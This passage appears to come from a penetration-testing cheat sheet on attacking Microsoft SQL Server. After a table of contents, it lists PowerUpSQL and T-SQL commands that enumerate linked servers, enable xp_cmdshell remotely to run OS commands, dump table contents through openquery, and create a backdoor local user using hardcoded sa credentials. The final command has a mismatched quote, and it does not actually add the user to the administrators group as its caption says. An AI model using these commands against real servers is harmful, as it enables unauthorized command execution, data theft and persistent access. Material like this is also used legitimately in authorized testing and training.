* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
* [CLR Assemblies](#clr-assemblies)
* [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
* [OLE Automation](#ole-automation)
* [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
* [Agent Jobs](#agent-jobs)
* [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service)
* [List All Jobs](#list-all-jobs)
* [External Scripts](#external-scripts)
* [Python](#python)
* [R](#r)
* [Audit Checks](#audit-checks)
* [Find and exploit impersonation opportunities](#find-and-explit-impersonation-opportunities)
* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy)
* [Manual SQL Server Queries](#manual-sql-server-queries)
* [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin)
* [Current Role](#current-role)
* [Current DB](#current-db)
* [List all tables](#list-all-tables)
* [List all databases](#list-all-databases)
* [All Logins on Server](#all-logins-on-server)
* [All Database Users for a Database](#all-database-users-for-a-database)
* [List All Sysadmins](#list-all-sysadmins)
* [List All Database Roles](#list-all-database-role)
* [Effective Permissions from the Server](#effective-permissions-from-the-server)
* [Effective Permissions from the Database](#effective-permissions-from-the-database)
* [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database)
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DBSERVERNAME\DBInstance>`",'select @@version')" -Verbose
### Execute Procedure on Linked Database
SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local";
SQL> EXECUTE('RECONFIGURE') at "linked.database.local";
SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local";
### Determine Names of Linked Databases
> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query.
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from sys.databases')" -Verbose
### Determine All the Tables Names from a Selected Linked Database
> The result is TableName which feeds into following query
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select name from <DatabaseNameFromPreviousCommand>.sys.tables')" -Verbose
### Gather the Top 5 Columns from a Selected Linked Table
> The results are ColumnName and ColumnValue which feed into following query
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`",'select TOP 5 * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand>')" -Verbose
### Gather Entries from a Selected Linked Column
Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "select * from openquery(`"<DatabaseLinkName>`"'select * from <DatabaseNameFromPreviousCommand>.dbo.<TableNameFromPreviousCommand> where <ColumnNameFromPreviousCommand>=<ColumnValueFromPreviousCommand>')" -Verbose
### Command Execution via xp_cmdshell
> xp_cmdshell disabled by default since SQL Server 2005
Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command whoami
Creates and adds local user backup to the local administrators group:
Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "net user backup Password1234 /add' -Verbose